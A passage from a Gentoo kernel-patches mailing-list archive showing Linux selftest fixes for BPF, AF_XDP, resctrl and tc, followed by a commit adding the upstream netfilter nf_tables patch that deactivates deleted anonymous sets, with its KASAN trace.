+ 	{ "use_after_unlock_push_back", "invalid mem access 'scalar'" },
+ 	{ "double_push_front", "arg#1 expected pointer to allocated object" },
+diff --git a/tools/testing/selftests/bpf/prog_tests/perf_event_stackmap.c b/tools/testing/selftests/bpf/prog_tests/perf_event_stackmap.c
+index 33144c9432aeb..f4aad35afae16 100644
+--- a/tools/testing/selftests/bpf/prog_tests/perf_event_stackmap.c
++++ b/tools/testing/selftests/bpf/prog_tests/perf_event_stackmap.c
+@@ -63,7 +63,8 @@ void test_perf_event_stackmap(void)
+ 			PERF_SAMPLE_BRANCH_NO_FLAGS |
+ 			PERF_SAMPLE_BRANCH_NO_CYCLES |
+ 			PERF_SAMPLE_BRANCH_CALL_STACK,
+-		.sample_period = 5000,
++		.freq = 1,
++		.sample_freq = read_perf_max_sample_freq(),
+ 		.size = sizeof(struct perf_event_attr),
+ 	};
+ 	struct perf_event_stackmap *skel;
+diff --git a/tools/testing/selftests/bpf/prog_tests/stacktrace_build_id_nmi.c b/tools/testing/selftests/bpf/prog_tests/stacktrace_build_id_nmi.c
+index f4ea1a215ce4d..704f7f6c3704a 100644
+--- a/tools/testing/selftests/bpf/prog_tests/stacktrace_build_id_nmi.c
++++ b/tools/testing/selftests/bpf/prog_tests/stacktrace_build_id_nmi.c
+@@ -2,21 +2,6 @@
+ #include <test_progs.h>
+ #include "test_stacktrace_build_id.skel.h"
+ 
+-static __u64 read_perf_max_sample_freq(void)
+-{
+-	__u64 sample_freq = 5000; /* fallback to 5000 on error */
+-	FILE *f;
+-	__u32 duration = 0;
+-
+-	f = fopen("/proc/sys/kernel/perf_event_max_sample_rate", "r");
+-	if (f == NULL)
+-		return sample_freq;
+-	CHECK(fscanf(f, "%llu", &sample_freq) != 1, "Get max sample rate",
+-		  "return default value: 5000,err %d\n", -errno);
+-	fclose(f);
+-	return sample_freq;
+-}
+-
+ void test_stacktrace_build_id_nmi(void)
+ {
+ 	int control_map_fd, stackid_hmap_fd, stackmap_fd;
+diff --git a/tools/testing/selftests/bpf/progs/linked_list.c b/tools/testing/selftests/bpf/progs/linked_list.c
+index 4ad88da5cda2d..4fa4a9b01bde3 100644
+--- a/tools/testing/selftests/bpf/progs/linked_list.c
++++ b/tools/testing/selftests/bpf/progs/linked_list.c
+@@ -260,7 +260,7 @@ int test_list_push_pop_multiple(struct bpf_spin_lock *lock, struct bpf_list_head
+ {
+ 	int ret;
+ 
+-	ret = list_push_pop_multiple(lock ,head, false);
++	ret = list_push_pop_multiple(lock, head, false);
+ 	if (ret)
+ 		return ret;
+ 	return list_push_pop_multiple(lock, head, true);
+diff --git a/tools/testing/selftests/bpf/progs/linked_list_fail.c b/tools/testing/selftests/bpf/progs/linked_list_fail.c
+index 1d9017240e197..69cdc07cba13a 100644
+--- a/tools/testing/selftests/bpf/progs/linked_list_fail.c
++++ b/tools/testing/selftests/bpf/progs/linked_list_fail.c
+@@ -54,28 +54,44 @@
+ 		return 0;                                   \
+ 	}
+ 
+-CHECK(kptr, push_front, &f->head);
+-CHECK(kptr, push_back, &f->head);
+ CHECK(kptr, pop_front, &f->head);
+ CHECK(kptr, pop_back, &f->head);
+ 
+-CHECK(global, push_front, &ghead);
+-CHECK(global, push_back, &ghead);
+ CHECK(global, pop_front, &ghead);
+ CHECK(global, pop_back, &ghead);
+ 
+-CHECK(map, push_front, &v->head);
+-CHECK(map, push_back, &v->head);
+ CHECK(map, pop_front, &v->head);
+ CHECK(map, pop_back, &v->head);
+ 
+-CHECK(inner_map, push_front, &iv->head);
+-CHECK(inner_map, push_back, &iv->head);
+ CHECK(inner_map, pop_front, &iv->head);
+ CHECK(inner_map, pop_back, &iv->head);
+ 
+ #undef CHECK
+ 
++#define CHECK(test, op, hexpr, nexpr)					\
++	SEC("?tc")							\
++	int test##_missing_lock_##op(void *ctx)				\
++	{								\
++		INIT;							\
++		void (*p)(void *, void *) = (void *)&bpf_list_##op;	\
++		p(hexpr, nexpr);					\
++		return 0;						\
++	}
++
++CHECK(kptr, push_front, &f->head, b);
++CHECK(kptr, push_back, &f->head, b);
++
++CHECK(global, push_front, &ghead, f);
++CHECK(global, push_back, &ghead, f);
++
++CHECK(map, push_front, &v->head, f);
++CHECK(map, push_back, &v->head, f);
++
++CHECK(inner_map, push_front, &iv->head, f);
++CHECK(inner_map, push_back, &iv->head, f);
++
++#undef CHECK
++
+ #define CHECK(test, op, lexpr, hexpr)                       \
+ 	SEC("?tc")                                          \
+ 	int test##_incorrect_lock_##op(void *ctx)           \
+@@ -108,11 +124,47 @@ CHECK(inner_map, pop_back, &iv->head);
+ 	CHECK(inner_map_global, op, &iv->lock, &ghead);        \
+ 	CHECK(inner_map_map, op, &iv->lock, &v->head);
+ 
+-CHECK_OP(push_front);
+-CHECK_OP(push_back);
+ CHECK_OP(pop_front);
+ CHECK_OP(pop_back);
+ 
++#undef CHECK
++#undef CHECK_OP
++
++#define CHECK(test, op, lexpr, hexpr, nexpr)				\
++	SEC("?tc")							\
++	int test##_incorrect_lock_##op(void *ctx)			\
++	{								\
++		INIT;							\
++		void (*p)(void *, void*) = (void *)&bpf_list_##op;	\
++		bpf_spin_lock(lexpr);					\
++		p(hexpr, nexpr);					\
++		return 0;						\
++	}
++
++#define CHECK_OP(op)							\
++	CHECK(kptr_kptr, op, &f1->lock, &f2->head, b);			\
++	CHECK(kptr_global, op, &f1->lock, &ghead, f);			\
++	CHECK(kptr_map, op, &f1->lock, &v->head, f);			\
++	CHECK(kptr_inner_map, op, &f1->lock, &iv->head, f);		\
++									\
++	CHECK(global_global, op, &glock2, &ghead, f);			\
++	CHECK(global_kptr, op, &glock, &f1->head, b);			\
++	CHECK(global_map, op, &glock, &v->head, f);			\
++	CHECK(global_inner_map, op, &glock, &iv->head, f);		\
++									\
++	CHECK(map_map, op, &v->lock, &v2->head, f);			\
++	CHECK(map_kptr, op, &v->lock, &f2->head, b);			\
++	CHECK(map_global, op, &v->lock, &ghead, f);			\
++	CHECK(map_inner_map, op, &v->lock, &iv->head, f);		\
++									\
++	CHECK(inner_map_inner_map, op, &iv->lock, &iv2->head, f);	\
++	CHECK(inner_map_kptr, op, &iv->lock, &f2->head, b);		\
++	CHECK(inner_map_global, op, &iv->lock, &ghead, f);		\
++	CHECK(inner_map_map, op, &iv->lock, &v->head, f);
++
++CHECK_OP(push_front);
++CHECK_OP(push_back);
++
+ #undef CHECK
+ #undef CHECK_OP
+ #undef INIT
+@@ -303,34 +355,6 @@ int direct_write_node(void *ctx)
+ 	return 0;
+ }
+ 
+-static __always_inline
+-int write_after_op(void (*push_op)(void *head, void *node))
+-{
+-	struct foo *f;
+-
+-	f = bpf_obj_new(typeof(*f));
+-	if (!f)
+-		return 0;
+-	bpf_spin_lock(&glock);
+-	push_op(&ghead, &f->node);
+-	f->data = 42;
+-	bpf_spin_unlock(&glock);
+-
+-	return 0;
+-}
+-
+-SEC("?tc")
+-int write_after_push_front(void *ctx)
+-{
+-	return write_after_op((void *)bpf_list_push_front);
+-}
+-
+-SEC("?tc")
+-int write_after_push_back(void *ctx)
+-{
+-	return write_after_op((void *)bpf_list_push_back);
+-}
+-
+ static __always_inline
+ int use_after_unlock(void (*op)(void *head, void *node))
+ {
+diff --git a/tools/testing/selftests/bpf/test_xsk.sh b/tools/testing/selftests/bpf/test_xsk.sh
+index d821fd0985049..4e3ec38cbe68c 100755
+--- a/tools/testing/selftests/bpf/test_xsk.sh
++++ b/tools/testing/selftests/bpf/test_xsk.sh
+@@ -118,6 +118,7 @@ setup_vethPairs() {
+ 	ip link add ${VETH0} numtxqueues 4 numrxqueues 4 type veth peer name ${VETH1} numtxqueues 4 numrxqueues 4
+ 	if [ -f /proc/net/if_inet6 ]; then
+ 		echo 1 > /proc/sys/net/ipv6/conf/${VETH0}/disable_ipv6
++		echo 1 > /proc/sys/net/ipv6/conf/${VETH1}/disable_ipv6
+ 	fi
+ 	if [[ $verbose -eq 1 ]]; then
+ 	        echo "setting up ${VETH1}: namespace: ${NS1}"
+diff --git a/tools/testing/selftests/bpf/testing_helpers.c b/tools/testing/selftests/bpf/testing_helpers.c
+index 9695318e8132d..9c3de39023f60 100644
+--- a/tools/testing/selftests/bpf/testing_helpers.c
++++ b/tools/testing/selftests/bpf/testing_helpers.c
+@@ -229,3 +229,23 @@ int bpf_test_load_program(enum bpf_prog_type type, const struct bpf_insn *insns,
+ 
+ 	return bpf_prog_load(type, NULL, license, insns, insns_cnt, &opts);
+ }
++
++__u64 read_perf_max_sample_freq(void)
++{
++	__u64 sample_freq = 5000; /* fallback to 5000 on error */
++	FILE *f;
++
++	f = fopen("/proc/sys/kernel/perf_event_max_sample_rate", "r");
++	if (f == NULL) {
++		printf("Failed to open /proc/sys/kernel/perf_event_max_sample_rate: err %d\n"
++		       "return default value: 5000\n", -errno);
++		return sample_freq;
++	}
++	if (fscanf(f, "%llu", &sample_freq) != 1) {
++		printf("Failed to parse /proc/sys/kernel/perf_event_max_sample_rate: err %d\n"
++		       "return default value: 5000\n", -errno);
++	}
++
++	fclose(f);
++	return sample_freq;
++}
+diff --git a/tools/testing/selftests/bpf/testing_helpers.h b/tools/testing/selftests/bpf/testing_helpers.h
+index 6ec00bf79cb55..eb8790f928e4c 100644
+--- a/tools/testing/selftests/bpf/testing_helpers.h
++++ b/tools/testing/selftests/bpf/testing_helpers.h
+@@ -20,3 +20,5 @@ struct test_filter_set;
+ int parse_test_list(const char *s,
+ 		    struct test_filter_set *test_set,
+ 		    bool is_glob_pattern);
++
++__u64 read_perf_max_sample_freq(void);
+diff --git a/tools/testing/selftests/bpf/xskxceiver.c b/tools/testing/selftests/bpf/xskxceiver.c
+index 1b9f48daa2257..b74dddf6bbbe5 100644
+--- a/tools/testing/selftests/bpf/xskxceiver.c
++++ b/tools/testing/selftests/bpf/xskxceiver.c
+@@ -649,7 +649,6 @@ static struct pkt_stream *pkt_stream_generate(struct xsk_umem_info *umem, u32 nb
+ 	if (!pkt_stream)
+ 		exit_with_error(ENOMEM);
+ 
+-	pkt_stream->nb_pkts = nb_pkts;
+ 	for (i = 0; i < nb_pkts; i++) {
+ 		pkt_set(umem, &pkt_stream->pkts[i], (i % umem->num_frames) * umem->frame_size,
+ 			pkt_len);
+@@ -1142,7 +1141,14 @@ static int validate_rx_dropped(struct ifobject *ifobject)
+ 	if (err)
+ 		return TEST_FAILURE;
+ 
+-	if (stats.rx_dropped == ifobject->pkt_stream->nb_pkts / 2)
++	/* The receiver calls getsockopt after receiving the last (valid)
++	 * packet which is not the final packet sent in this test (valid and
++	 * invalid packets are sent in alternating fashion with the final
++	 * packet being invalid). Since the last packet may or may not have
++	 * been dropped already, both outcomes must be allowed.
++	 */
++	if (stats.rx_dropped == ifobject->pkt_stream->nb_pkts / 2 ||
++	    stats.rx_dropped == ifobject->pkt_stream->nb_pkts / 2 - 1)
+ 		return TEST_PASS;
+ 
+ 	return TEST_FAILURE;
+@@ -1662,6 +1668,7 @@ static void testapp_single_pkt(struct test_spec *test)
+ 
+ static void testapp_invalid_desc(struct test_spec *test)
+ {
++	u64 umem_size = test->ifobj_tx->umem->num_frames * test->ifobj_tx->umem->frame_size;
+ 	struct pkt pkts[] = {
+ 		/* Zero packet address allowed */
+ 		{0, PKT_SIZE, 0, true},
+@@ -1672,9 +1679,9 @@ static void testapp_invalid_desc(struct test_spec *test)
+ 		/* Packet too large */
+ 		{0x2000, XSK_UMEM__INVALID_FRAME_SIZE, 0, false},
+ 		/* After umem ends */
+-		{UMEM_SIZE, PKT_SIZE, 0, false},
++		{umem_size, PKT_SIZE, 0, false},
+ 		/* Straddle the end of umem */
+-		{UMEM_SIZE - PKT_SIZE / 2, PKT_SIZE, 0, false},
++		{umem_size - PKT_SIZE / 2, PKT_SIZE, 0, false},
+ 		/* Straddle a page boundrary */
+ 		{0x3000 - PKT_SIZE / 2, PKT_SIZE, 0, false},
+ 		/* Straddle a 2K boundrary */
+@@ -1692,8 +1699,8 @@ static void testapp_invalid_desc(struct test_spec *test)
+ 	}
+ 
+ 	if (test->ifobj_tx->shared_umem) {
+-		pkts[4].addr += UMEM_SIZE;
+-		pkts[5].addr += UMEM_SIZE;
++		pkts[4].addr += umem_size;
++		pkts[5].addr += umem_size;
+ 	}
+ 
+ 	pkt_stream_generate_custom(test, pkts, ARRAY_SIZE(pkts));
+diff --git a/tools/testing/selftests/bpf/xskxceiver.h b/tools/testing/selftests/bpf/xskxceiver.h
+index edb76d2def9fe..292fc943b8fdf 100644
+--- a/tools/testing/selftests/bpf/xskxceiver.h
++++ b/tools/testing/selftests/bpf/xskxceiver.h
+@@ -52,7 +52,6 @@
+ #define THREAD_TMOUT 3
+ #define DEFAULT_PKT_CNT (4 * 1024)
+ #define DEFAULT_UMEM_BUFFERS (DEFAULT_PKT_CNT / 4)
+-#define UMEM_SIZE (DEFAULT_UMEM_BUFFERS * XSK_UMEM__DEFAULT_FRAME_SIZE)
+ #define RX_FULL_RXQSIZE 32
+ #define UMEM_HEADROOM_TEST_SIZE 128
+ #define XSK_UMEM__INVALID_FRAME_SIZE (XSK_UMEM__DEFAULT_FRAME_SIZE + 1)
+diff --git a/tools/testing/selftests/mount_setattr/mount_setattr_test.c b/tools/testing/selftests/mount_setattr/mount_setattr_test.c
+index 8c5fea68ae677..969647228817b 100644
+--- a/tools/testing/selftests/mount_setattr/mount_setattr_test.c
++++ b/tools/testing/selftests/mount_setattr/mount_setattr_test.c
+@@ -18,6 +18,7 @@
+ #include <grp.h>
+ #include <stdbool.h>
+ #include <stdarg.h>
++#include <linux/mount.h>
+ 
+ #include "../kselftest_harness.h"
+ 
+diff --git a/tools/testing/selftests/powerpc/pmu/sampling_tests/mmcra_thresh_marked_sample_test.c b/tools/testing/selftests/powerpc/pmu/sampling_tests/mmcra_thresh_marked_sample_test.c
+index 022cc1655eb52..75527876ad3c1 100644
+--- a/tools/testing/selftests/powerpc/pmu/sampling_tests/mmcra_thresh_marked_sample_test.c
++++ b/tools/testing/selftests/powerpc/pmu/sampling_tests/mmcra_thresh_marked_sample_test.c
+@@ -63,9 +63,9 @@ static int mmcra_thresh_marked_sample(void)
+ 			get_mmcra_thd_stop(get_reg_value(intr_regs, "MMCRA"), 4));
+ 	FAIL_IF(EV_CODE_EXTRACT(event.attr.config, marked) !=
+ 			get_mmcra_marked(get_reg_value(intr_regs, "MMCRA"), 4));
+-	FAIL_IF(EV_CODE_EXTRACT(event.attr.config, sample >> 2) !=
++	FAIL_IF((EV_CODE_EXTRACT(event.attr.config, sample) >> 2) !=
+ 			get_mmcra_rand_samp_elig(get_reg_value(intr_regs, "MMCRA"), 4));
+-	FAIL_IF(EV_CODE_EXTRACT(event.attr.config, sample & 0x3) !=
++	FAIL_IF((EV_CODE_EXTRACT(event.attr.config, sample) & 0x3) !=
+ 			get_mmcra_sample_mode(get_reg_value(intr_regs, "MMCRA"), 4));
+ 	FAIL_IF(EV_CODE_EXTRACT(event.attr.config, sm) !=
+ 			get_mmcra_sm(get_reg_value(intr_regs, "MMCRA"), 4));
+diff --git a/tools/testing/selftests/resctrl/cache.c b/tools/testing/selftests/resctrl/cache.c
+index 68ff856d36f0b..0485863a169f2 100644
+--- a/tools/testing/selftests/resctrl/cache.c
++++ b/tools/testing/selftests/resctrl/cache.c
+@@ -244,10 +244,12 @@ int cat_val(struct resctrl_val_param *param)
+ 	while (1) {
+ 		if (!strncmp(resctrl_val, CAT_STR, sizeof(CAT_STR))) {
+ 			ret = param->setup(1, param);
+-			if (ret) {
++			if (ret == END_OF_TESTS) {
+ 				ret = 0;
+ 				break;
+ 			}
++			if (ret < 0)
++				break;
+ 			ret = reset_enable_llc_perf(bm_pid, param->cpu_no);
+ 			if (ret)
+ 				break;
+diff --git a/tools/testing/selftests/resctrl/cat_test.c b/tools/testing/selftests/resctrl/cat_test.c
+index 1c5e90c632548..2d3c7c77ab6cb 100644
+--- a/tools/testing/selftests/resctrl/cat_test.c
++++ b/tools/testing/selftests/resctrl/cat_test.c
+@@ -40,7 +40,7 @@ static int cat_setup(int num, ...)
+ 
+ 	/* Run NUM_OF_RUNS times */
+ 	if (p->num_of_runs >= NUM_OF_RUNS)
+-		return -1;
++		return END_OF_TESTS;
+ 
+ 	if (p->num_of_runs == 0) {
+ 		sprintf(schemata, "%lx", p->mask);
+diff --git a/tools/testing/selftests/resctrl/cmt_test.c b/tools/testing/selftests/resctrl/cmt_test.c
+index 8968e36db99d7..3b0454e7fc826 100644
+--- a/tools/testing/selftests/resctrl/cmt_test.c
++++ b/tools/testing/selftests/resctrl/cmt_test.c
+@@ -32,7 +32,7 @@ static int cmt_setup(int num, ...)
+ 
+ 	/* Run NUM_OF_RUNS times */
+ 	if (p->num_of_runs >= NUM_OF_RUNS)
+-		return -1;
++		return END_OF_TESTS;
+ 
+ 	p->num_of_runs++;
+ 
+diff --git a/tools/testing/selftests/resctrl/fill_buf.c b/tools/testing/selftests/resctrl/fill_buf.c
+index 56ccbeae0638d..c20d0a7ecbe63 100644
+--- a/tools/testing/selftests/resctrl/fill_buf.c
++++ b/tools/testing/selftests/resctrl/fill_buf.c
+@@ -68,6 +68,8 @@ static void *malloc_and_init_memory(size_t s)
+ 	size_t s64;
+ 
+ 	void *p = memalign(PAGE_SIZE, s);
++	if (!p)
++		return NULL;
+ 
+ 	p64 = (uint64_t *)p;
+ 	s64 = s / sizeof(uint64_t);
+diff --git a/tools/testing/selftests/resctrl/mba_test.c b/tools/testing/selftests/resctrl/mba_test.c
+index 1a1bdb6180cf2..97dc98c0c9497 100644
+--- a/tools/testing/selftests/resctrl/mba_test.c
++++ b/tools/testing/selftests/resctrl/mba_test.c
+@@ -28,6 +28,7 @@ static int mba_setup(int num, ...)
+ 	struct resctrl_val_param *p;
+ 	char allocation_str[64];
+ 	va_list param;
++	int ret;
+ 
+ 	va_start(param, num);
+ 	p = va_arg(param, struct resctrl_val_param *);
+@@ -41,11 +42,15 @@ static int mba_setup(int num, ...)
+ 		return 0;
+ 
+ 	if (allocation < ALLOCATION_MIN || allocation > ALLOCATION_MAX)
+-		return -1;
++		return END_OF_TESTS;
+ 
+ 	sprintf(allocation_str, "%d", allocation);
+ 
+-	write_schemata(p->ctrlgrp, allocation_str, p->cpu_no, p->resctrl_val);
++	ret = write_schemata(p->ctrlgrp, allocation_str, p->cpu_no,
++			     p->resctrl_val);
++	if (ret < 0)
++		return ret;
++
+ 	allocation -= ALLOCATION_STEP;
+ 
+ 	return 0;
+diff --git a/tools/testing/selftests/resctrl/mbm_test.c b/tools/testing/selftests/resctrl/mbm_test.c
+index 8392e5c55ed02..280187628054d 100644
+--- a/tools/testing/selftests/resctrl/mbm_test.c
++++ b/tools/testing/selftests/resctrl/mbm_test.c
+@@ -95,7 +95,7 @@ static int mbm_setup(int num, ...)
+ 
+ 	/* Run NUM_OF_RUNS times */
+ 	if (num_of_runs++ >= NUM_OF_RUNS)
+-		return -1;
++		return END_OF_TESTS;
+ 
+ 	va_start(param, num);
+ 	p = va_arg(param, struct resctrl_val_param *);
+diff --git a/tools/testing/selftests/resctrl/resctrl.h b/tools/testing/selftests/resctrl/resctrl.h
+index f0ded31fb3c7c..f44fa2de4d986 100644
+--- a/tools/testing/selftests/resctrl/resctrl.h
++++ b/tools/testing/selftests/resctrl/resctrl.h
+@@ -37,6 +37,8 @@
+ #define ARCH_INTEL     1
+ #define ARCH_AMD       2
+ 
++#define END_OF_TESTS	1
++
+ #define PARENT_EXIT(err_msg)			\
+ 	do {					\
+ 		perror(err_msg);		\
+diff --git a/tools/testing/selftests/resctrl/resctrl_val.c b/tools/testing/selftests/resctrl/resctrl_val.c
+index b32b96356ec70..00864242d76c6 100644
+--- a/tools/testing/selftests/resctrl/resctrl_val.c
++++ b/tools/testing/selftests/resctrl/resctrl_val.c
+@@ -734,29 +734,24 @@ int resctrl_val(char **benchmark_cmd, struct resctrl_val_param *param)
+ 
+ 	/* Test runs until the callback setup() tells the test to stop. */
+ 	while (1) {
++		ret = param->setup(1, param);
++		if (ret == END_OF_TESTS) {
++			ret = 0;
++			break;
++		}
++		if (ret < 0)
++			break;
++
+ 		if (!strncmp(resctrl_val, MBM_STR, sizeof(MBM_STR)) ||
+ 		    !strncmp(resctrl_val, MBA_STR, sizeof(MBA_STR))) {
+-			ret = param->setup(1, param);
+-			if (ret) {
+-				ret = 0;
+-				break;
+-			}
+-
+ 			ret = measure_vals(param, &bw_resc_start);
+ 			if (ret)
+ 				break;
+ 		} else if (!strncmp(resctrl_val, CMT_STR, sizeof(CMT_STR))) {
+-			ret = param->setup(1, param);
+-			if (ret) {
+-				ret = 0;
+-				break;
+-			}
+ 			sleep(1);
+ 			ret = measure_cache_vals(param, bm_pid);
+ 			if (ret)
+ 				break;
+-		} else {
+-			break;
+ 		}
+ 	}
+ 
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/fq.json b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/fq.json
+index 8acb904d14193..3593fb8f79ad3 100644
+--- a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/fq.json
++++ b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/fq.json
+@@ -114,6 +114,28 @@
+             "$IP link del dev $DUMMY type dummy"
+         ]
+     },
++    {
++        "id": "10f7",
++        "name": "Create FQ with invalid initial_quantum setting",
++        "category": [
++            "qdisc",
++            "fq"
++        ],
++        "plugins": {
++            "requires": "nsPlugin"
++        },
++        "setup": [
++            "$IP link add dev $DUMMY type dummy || /bin/true"
++        ],
++        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root fq initial_quantum 0x80000000",
++        "expExitCode": "2",
++        "verifyCmd": "$TC qdisc show dev $DUMMY",
++        "matchPattern": "qdisc fq 1: root.*initial_quantum 2048Mb",
++        "matchCount": "0",
++        "teardown": [
++            "$IP link del dev $DUMMY type dummy"
++        ]
++    },
+     {
+         "id": "9398",
+         "name": "Create FQ with maxrate setting",
+diff --git a/tools/testing/selftests/user_events/ftrace_test.c b/tools/testing/selftests/user_events/ftrace_test.c
+index 404a2713dcae8..1bc26e6476fc3 100644
+--- a/tools/testing/selftests/user_events/ftrace_test.c
++++ b/tools/testing/selftests/user_events/ftrace_test.c
+@@ -294,6 +294,11 @@ TEST_F(user, write_events) {
+ 	ASSERT_NE(-1, writev(self->data_fd, (const struct iovec *)io, 3));
+ 	after = trace_bytes();
+ 	ASSERT_GT(after, before);
++
++	/* Negative index should fail with EINVAL */
++	reg.write_index = -1;
++	ASSERT_EQ(-1, writev(self->data_fd, (const struct iovec *)io, 3));
++	ASSERT_EQ(EINVAL, errno);
+ }
+ 
+ TEST_F(user, write_fault) {
+diff --git a/tools/verification/rv/src/rv.c b/tools/verification/rv/src/rv.c
+index e601cd9c411e1..1ddb855328165 100644
+--- a/tools/verification/rv/src/rv.c
++++ b/tools/verification/rv/src/rv.c
+@@ -74,7 +74,7 @@ static void rv_list(int argc, char **argv)
+ static void rv_mon(int argc, char **argv)
+ {
+ 	char *monitor_name;
+-	int i, run;
++	int i, run = 0;
+ 
+ 	static const char *const usage[] = {
+ 		"",


* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-05-10 17:52 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-05-10 17:52 UTC (permalink / raw
  To: gentoo-commits

commit:     e2431152ce78342551aabb51d029f531c84aef57
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed May 10 17:48:27 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed May 10 17:48:27 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e2431152

netfilter: nf_tables: deactivate anonymous set from preparation phase

Bug: https://bugs.gentoo.org/90606
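
The fix pairs set activation with a phase-aware deactivation. A
condensed sketch of the two hooks, with identifiers taken verbatim
from the patch below (the real functions handle further transaction
phases and have more callers):

	/* Roll-back path: an aborted transaction must make the
	 * anonymous set visible again before restoring its refcount. */
	void nf_tables_activate_set(const struct nft_ctx *ctx,
				    struct nft_set *set)
	{
		if (nft_set_is_anonymous(set))
			nft_clear(ctx->net, set);

		set->use++;
	}

	/* Preparation phase: flag a deleted anonymous set as inactive
	 * in the next generation so that later updates in the same
	 * batch can no longer target it. */
	void nf_tables_deactivate_set(const struct nft_ctx *ctx,
				      struct nft_set *set,
				      struct nft_set_binding *binding,
				      enum nft_trans_phase phase)
	{
		switch (phase) {
		case NFT_TRANS_PREPARE:
			if (nft_set_is_anonymous(set))
				nft_deactivate_next(ctx->net, set);

			set->use--;
			return;
		default:
			/* other phases unchanged; see the full patch */
			return;
		}
	}

The expression activate paths (nft_dynset, nft_lookup, nft_objref)
then call nf_tables_activate_set() instead of bumping set->use
directly.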

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |   4 +
 ...nf-tables-make-deleted-anon-sets-inactive.patch | 121 +++++++++++++++++++++
 2 files changed, 125 insertions(+)

diff --git a/0000_README b/0000_README
index 00341fe3..a1325df7 100644
--- a/0000_README
+++ b/0000_README
@@ -107,6 +107,10 @@ Patch:  1510_fs-enable-link-security-restrictions-by-default.patch
 From:   http://sources.debian.net/src/linux/3.16.7-ckt4-3/debian/patches/debian/fs-enable-link-security-restrictions-by-default.patch/
 Desc:   Enable link security restrictions by default.
 
+Patch:  1520_nf-tables-make-deleted-anon-sets-inactive.patch
+From:   https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/patch/?id=c1592a89942e9678f7d9c8030efa777c0d57edab
+Desc:   netfilter: nf_tables: deactivate anonymous set from preparation phase
+
 Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 

diff --git a/1520_nf-tables-make-deleted-anon-sets-inactive.patch b/1520_nf-tables-make-deleted-anon-sets-inactive.patch
new file mode 100644
index 00000000..cd75de5c
--- /dev/null
+++ b/1520_nf-tables-make-deleted-anon-sets-inactive.patch
@@ -0,0 +1,121 @@
+From c1592a89942e9678f7d9c8030efa777c0d57edab Mon Sep 17 00:00:00 2001
+From: Pablo Neira Ayuso <pablo@netfilter.org>
+Date: Tue, 2 May 2023 10:25:24 +0200
+Subject: netfilter: nf_tables: deactivate anonymous set from preparation phase
+
+Toggle deleted anonymous sets as inactive in the next generation, so
+users cannot perform any update on it. Clear the generation bitmask
+in case the transaction is aborted.
+
+The following KASAN splat shows a set element deletion for a bound
+anonymous set that has been already removed in the same transaction.
+
+[   64.921510] ==================================================================
+[   64.923123] BUG: KASAN: wild-memory-access in nf_tables_commit+0xa24/0x1490 [nf_tables]
+[   64.924745] Write of size 8 at addr dead000000000122 by task test/890
+[   64.927903] CPU: 3 PID: 890 Comm: test Not tainted 6.3.0+ #253
+[   64.931120] Call Trace:
+[   64.932699]  <TASK>
+[   64.934292]  dump_stack_lvl+0x33/0x50
+[   64.935908]  ? nf_tables_commit+0xa24/0x1490 [nf_tables]
+[   64.937551]  kasan_report+0xda/0x120
+[   64.939186]  ? nf_tables_commit+0xa24/0x1490 [nf_tables]
+[   64.940814]  nf_tables_commit+0xa24/0x1490 [nf_tables]
+[   64.942452]  ? __kasan_slab_alloc+0x2d/0x60
+[   64.944070]  ? nf_tables_setelem_notify+0x190/0x190 [nf_tables]
+[   64.945710]  ? kasan_set_track+0x21/0x30
+[   64.947323]  nfnetlink_rcv_batch+0x709/0xd90 [nfnetlink]
+[   64.948898]  ? nfnetlink_rcv_msg+0x480/0x480 [nfnetlink]
+
+Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
+---
+ include/net/netfilter/nf_tables.h |  1 +
+ net/netfilter/nf_tables_api.c     | 12 ++++++++++++
+ net/netfilter/nft_dynset.c        |  2 +-
+ net/netfilter/nft_lookup.c        |  2 +-
+ net/netfilter/nft_objref.c        |  2 +-
+ 5 files changed, 16 insertions(+), 3 deletions(-)
+
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index 3ed21d2d56590..2e24ea1d744c2 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -619,6 +619,7 @@ struct nft_set_binding {
+ };
+ 
+ enum nft_trans_phase;
++void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set);
+ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			      struct nft_set_binding *binding,
+ 			      enum nft_trans_phase phase);
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 8b6c61a2196cb..59fb8320ab4d7 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -5127,12 +5127,24 @@ static void nf_tables_unbind_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 	}
+ }
+ 
++void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	if (nft_set_is_anonymous(set))
++		nft_clear(ctx->net, set);
++
++	set->use++;
++}
++EXPORT_SYMBOL_GPL(nf_tables_activate_set);
++
+ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			      struct nft_set_binding *binding,
+ 			      enum nft_trans_phase phase)
+ {
+ 	switch (phase) {
+ 	case NFT_TRANS_PREPARE:
++		if (nft_set_is_anonymous(set))
++			nft_deactivate_next(ctx->net, set);
++
+ 		set->use--;
+ 		return;
+ 	case NFT_TRANS_ABORT:
+diff --git a/net/netfilter/nft_dynset.c b/net/netfilter/nft_dynset.c
+index 274579b1696e0..bd19c7aec92ee 100644
+--- a/net/netfilter/nft_dynset.c
++++ b/net/netfilter/nft_dynset.c
